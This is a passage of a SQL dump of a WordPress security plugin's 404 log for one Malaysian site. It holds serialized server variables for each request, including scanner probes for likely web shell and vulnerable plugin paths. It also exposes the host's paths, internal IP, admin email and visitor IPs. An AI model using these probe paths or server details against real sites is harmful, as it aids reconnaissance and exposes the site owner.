\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:9:\"UNIQUE_ID\";s:27:\"XaOrnelZYF3OM5JckyOytAAAAZY\";s:11:\"nokeepalive\";s:1:\"1\";s:20:\"ssl_unclean_shutdown\";s:1:\"1\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1571007390.0468\";s:12:\"REQUEST_TIME\";s:10:\"1571007390\";}}','notice','2019-10-13 22:56:32','2019-10-13 22:56:30',35027856,36829240,'https://bintara.com.my/theme/default/sdcms_404.asp',1,0,'103.115.42.42'),(27980,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:45:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:44:\"/wp-content/uploads/2019/03/content-post.php\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:12:\"HTTP_REFERER\";s:14:\"http://site.ru\";s:15:\"HTTP_USER_AGENT\";s:116:\"Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/533.4 (KHTML, like Gecko) Chrome/5.0.375.99 Safari/533.4\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:32:\"REDIRECT_REDIRECT_REQUEST_METHOD\";s:3:\"GET\";s:28:\"REDIRECT_REDIRECT_SCRIPT_URI\";s:66:\"https://bintara.com.my/wp-content/uploads/2019/03/content-post.php\";s:28:\"REDIRECT_REDIRECT_SCRIPT_URL\";s:44:\"/wp-content/uploads/2019/03/content-post.php\";s:24:\"REDIRECT_REDIRECT_STATUS\";s:3:\"403\";s:27:\"REDIRECT_REDIRECT_UNIQUE_ID\";s:27:\"XaOPVOlZYF3OM5JckyOv-wAAAZM\";s:19:\"REDIRECT_SCRIPT_URI\";s:66:\"https://bintara.com.my/wp-content/uploads/2019/03/content-post.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:44:\"/wp-content/uploads/2019/03/content-post.php\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"403\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XaOPVOlZYF3OM5JckyOv-wAAAZM\";s:12:\"REDIRECT_URL\";s:10:\"/403.shtml\";s:11:\"REMOTE_ADDR\";s:11:\"91.208.99.2\";s:11:\"REMOTE_PORT\";s:5:\"38846\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:66:\"https://bintara.com.my/wp-content/uploads/2019/03/content-post.php\";s:10:\"SCRIPT_URL\";s:44:\"/wp-content/uploads/2019/03/content-post.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:9:\"UNIQUE_ID\";s:27:\"XaOPVOlZYF3OM5JckyOv-wAAAZM\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1571000148.2807\";s:12:\"REQUEST_TIME\";s:10:\"1571000148\";}}','notice','2019-10-13 20:55:50','2019-10-13 20:55:48',35024600,36826912,'https://bintara.com.my/wp-content/uploads/2019/03/content-post.php',1,0,'91.208.99.2'),(27979,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:45:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:44:\"/wp-content/uploads/2019/03/content-post.php\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:12:\"HTTP_REFERER\";s:14:\"http://site.ru\";s:15:\"HTTP_USER_AGENT\";s:116:\"Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/533.4 (KHTML, like Gecko) Chrome/5.0.375.99 Safari/533.4\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:32:\"REDIRECT_REDIRECT_REQUEST_METHOD\";s:3:\"GET\";s:28:\"REDIRECT_REDIRECT_SCRIPT_URI\";s:66:\"https://bintara.com.my/wp-content/uploads/2019/03/content-post.php\";s:28:\"REDIRECT_REDIRECT_SCRIPT_URL\";s:44:\"/wp-content/uploads/2019/03/content-post.php\";s:24:\"REDIRECT_REDIRECT_STATUS\";s:3:\"403\";s:27:\"REDIRECT_REDIRECT_UNIQUE_ID\";s:27:\"XaOPT53yMIdDGtzW2QqTPAAAAdE\";s:19:\"REDIRECT_SCRIPT_URI\";s:66:\"https://bintara.com.my/wp-content/uploads/2019/03/content-post.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:44:\"/wp-content/uploads/2019/03/content-post.php\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"403\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XaOPT53yMIdDGtzW2QqTPAAAAdE\";s:12:\"REDIRECT_URL\";s:10:\"/403.shtml\";s:11:\"REMOTE_ADDR\";s:11:\"91.208.99.2\";s:11:\"REMOTE_PORT\";s:5:\"55278\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:66:\"https://bintara.com.my/wp-content/uploads/2019/03/content-post.php\";s:10:\"SCRIPT_URL\";s:44:\"/wp-content/uploads/2019/03/content-post.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:9:\"UNIQUE_ID\";s:27:\"XaOPT53yMIdDGtzW2QqTPAAAAdE\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:14:\"1571000143.591\";s:12:\"REQUEST_TIME\";s:10:\"1571000143\";}}','notice','2019-10-13 20:55:47','2019-10-13 20:55:44',35478392,37281408,'https://bintara.com.my/wp-content/uploads/2019/03/content-post.php',1,0,'91.208.99.2'),(27978,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:12:\"/?page_id=18\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:63:\"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\";s:20:\"HTTP_ACCEPT_ENCODING\";s:13:\"gzip, deflate\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"en-US,en;q=0.5\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:8:\"HTTP_DNT\";s:1:\"1\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:72:\"Mozilla/5.0 (Windows NT 6.1; WOW64; rv:53.0) Gecko/20100101 Firefox/53.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:10:\"page_id=18\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:15:\"108.161.133.165\";s:11:\"REMOTE_PORT\";s:5:\"60041\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:23:\"https://bintara.com.my/\";s:10:\"SCRIPT_URL\";s:1:\"/\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:9:\"UNIQUE_ID\";s:27:\"XaOAbE-otKDtdVthBikwswAAAIc\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1570996332.7822\";s:12:\"REQUEST_TIME\";s:10:\"1570996332\";}}','notice','2019-10-13 19:52:15','2019-10-13 19:52:13',35421560,37231376,'https://bintara.com.my/?page_id=18',1,0,'108.161.133.165'),(28093,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:44:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:93:\"/blogs/wp-content/plugins/wp-e-commerce/wpsc-components/marketplace-core-v1/static/sputnik.js\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:8:\"identity\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:12:\"HTTP_REFERER\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:108:\"Mozilla/5.1 (Windows NT 6.0; WOW64) AppleWebKit/533.36 (KHTML, like Gecko) Chrome/46.0.2754.75 Safari/533.36\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:32:\"REDIRECT_REDIRECT_REQUEST_METHOD\";s:3:\"GET\";s:28:\"REDIRECT_REDIRECT_SCRIPT_URI\";s:115:\"https://bintara.com.my/blogs/wp-content/plugins/wp-e-commerce/wpsc-components/marketplace-core-v1/static/sputnik.js\";s:28:\"REDIRECT_REDIRECT_SCRIPT_URL\";s:93:\"/blogs/wp-content/plugins/wp-e-commerce/wpsc-components/marketplace-core-v1/static/sputnik.js\";s:24:\"REDIRECT_REDIRECT_STATUS\";s:3:\"403\";s:27:\"REDIRECT_REDIRECT_UNIQUE_ID\";s:27:\"XaZQ79wSqwmg3BSzc7@-BAAAAgA\";s:19:\"REDIRECT_SCRIPT_URI\";s:115:\"https://bintara.com.my/blogs/wp-content/plugins/wp-e-commerce/wpsc-components/marketplace-core-v1/static/sputnik.js\";s:19:\"REDIRECT_SCRIPT_URL\";s:93:\"/blogs/wp-content/plugins/wp-e-commerce/wpsc-components/marketplace-core-v1/static/sputnik.js\";s:15:\"REDIRECT_STATUS\";s:3:\"403\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XaZQ79wSqwmg3BSzc7@-BAAAAgA\";s:12:\"REDIRECT_URL\";s:10:\"/403.shtml\";s:11:\"REMOTE_ADDR\";s:12:\"151.80.54.15\";s:11:\"REMOTE_PORT\";s:5:\"53138\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:115:\"https://bintara.com.my/blogs/wp-content/plugins/wp-e-commerce/wpsc-components/marketplace-core-v1/static/sputnik.js\";s:10:\"SCRIPT_URL\";s:93:\"/blogs/wp-content/plugins/wp-e-commerce/wpsc-components/marketplace-core-v1/static/sputnik.js\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:9:\"UNIQUE_ID\";s:27:\"XaZQ79wSqwmg3BSzc7@-BAAAAgA\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1571180783.6713\";s:12:\"REQUEST_TIME\";s:10:\"1571180783\";}}','notice','2019-10-15 23:06:26','2019-10-15 23:06:24',35284048,37087848,'https://bintara.com.my/blogs/wp-content/plugins/wp-e-commerce/wpsc-components/marketplace-core-v1/static/sputnik.js',1,0,'151.80.54.15'),(28092,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:42:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:26:\"/my-account/lost-password/\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:63:\"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\";s:20:\"HTTP_ACCEPT_ENCODING\";s:15:\"gzip,deflate,br\";s:15:\"HTTP_CONNECTION\";s:10:\"keep-alive\";s:9:\"HTTP_FROM\";s:26:\"googlebot(at)googlebot.com\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:198:\"Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.96 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:48:\"https://bintara.com.my/my-account/lost-password/\";s:19:\"REDIRECT_SCRIPT_URL\";s:26:\"/my-account/lost-password/\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XaZOY3TLTfzmaEv6rGKwoQAAANM\";s:12:\"REDIRECT_URL\";s:26:\"/my-account/lost-password/\";s:11:\"REMOTE_ADDR\";s:12:\"66.249.71.30\";s:11:\"REMOTE_PORT\";s:5:\"38831\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:48:\"https://bintara.com.my/my-account/lost-password/\";s:10:\"SCRIPT_URL\";s:26:\"/my-account/lost-password/\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:9:\"UNIQUE_ID\";s:27:\"XaZOY3TLTfzmaEv6rGKwoQAAANM\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:14:\"1571180131.528\";s:12:\"REQUEST_TIME\";s:10:\"1571180131\";}}','notice','2019-10-15 22:55:34','2019-10-15 22:55:31',34359888,34716952,'https://bintara.com.my/my-account/lost-password/',1,0,'66.249.71.30'),(28091,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:12:\"/?page_id=18\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:63:\"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\";s:20:\"HTTP_ACCEPT_ENCODING\";s:13:\"gzip, deflate\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"en-US,en;q=0.5\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:8:\"HTTP_DNT\";s:1:\"1\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:132:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/65.0.3325.181 Safari/537.36 OPR/52.0.2871.64\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:10:\"page_id=18\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:15:\"158.115.254.236\";s:11:\"REMOTE_PORT\";s:5:\"28295\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:23:\"https://bintara.com.my/\";s:10:\"SCRIPT_URL\";s:1:\"/\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.0\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:9:\"UNIQUE_ID\";s:27:\"XaZGrHTLTfzmaEv6rGKs0AAAAMI\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1571178156.2938\";s:12:\"REQUEST_TIME\";s:10:\"1571178156\";}}','notice','2019-10-15 22:22:39','2019-10-15 22:22:36',35425216,37231744,'https://bintara.com.my/?page_id=18',1,0,'158.115.254.236'),(28090,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:42:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:26:\"/my-account/lost-password/\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:63:\"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\";s:20:\"HTTP_ACCEPT_ENCODING\";s:15:\"gzip,deflate,br\";s:15:\"HTTP_CONNECTION\";s:10:\"keep-alive\";s:9:\"HTTP_FROM\";s:26:\"googlebot(at)googlebot.com\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:72:\"Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:48:\"https://bintara.com.my/my-account/lost-password/\";s:19:\"REDIRECT_SCRIPT_URL\";s:26:\"/my-account/lost-password/\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XaZFM3TLTfzmaEv6rGKr-AAAANI\";s:12:\"REDIRECT_URL\";s:26:\"/my-account/lost-password/\";s:11:\"REMOTE_ADDR\";s:12:\"66.249.71.30\";s:11:\"REMOTE_PORT\";s:5:\"63697\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:48:\"https://bintara.com.my/my-account/lost-password/\";s:10:\"SCRIPT_URL\";s:26:\"/my-account/lost-password/\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:9:\"UNIQUE_ID\";s:27:\"XaZFM3TLTfzmaEv6rGKr-AAAANI\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1571177779.4201\";s:12:\"REQUEST_TIME\";s:10:\"1571177779\";}}','notice','2019-10-15 22:16:22','2019-10-15 22:16:19',34276448,34633088,'https://bintara.com.my/my-account/lost-password/',1,0,'66.249.71.30'),(28089,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:35:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:12:\"/?page_id=18\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:74:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:12:\"HTTP_REFERER\";s:34:\"https://bintara.com.my/?page_id=18\";s:15:\"HTTP_USER_AGENT\";s:114:\"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/68.0.3440.106 Safari/537.36 Kinza/4.9.1\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:10:\"page_id=18\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:11:\"89.231.65.6\";s:11:\"REMOTE_PORT\";s:5:\"58137\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:23:\"https://bintara.com.my/\";s:10:\"SCRIPT_URL\";s:1:\"/\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.0\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:9:\"UNIQUE_ID\";s:27:\"XaZA2XTLTfzmaEv6rGKpjgAAAMk\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1571176665.2183\";s:12:\"REQUEST_TIME\";s:10:\"1571176665\";}}','notice','2019-10-15 21:57:48','2019-10-15 21:57:45',35427656,37237192,'https://bintara.com.my/?page_id=18',1,0,'89.231.65.6'),(28088,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:12:\"/?page_id=11\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:63:\"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\";s:20:\"HTTP_ACCEPT_ENCODING\";s:13:\"gzip, deflate\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"en-US,en;q=0.5\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:8:\"HTTP_DNT\";s:1:\"1\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:110:\"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.117 Safari/537.36\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:10:\"page_id=11\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:13:\"171.22.252.66\";s:11:\"REMOTE_PORT\";s:5:\"33903\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:23:\"https://bintara.com.my/\";s:10:\"SCRIPT_URL\";s:1:\"/\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"S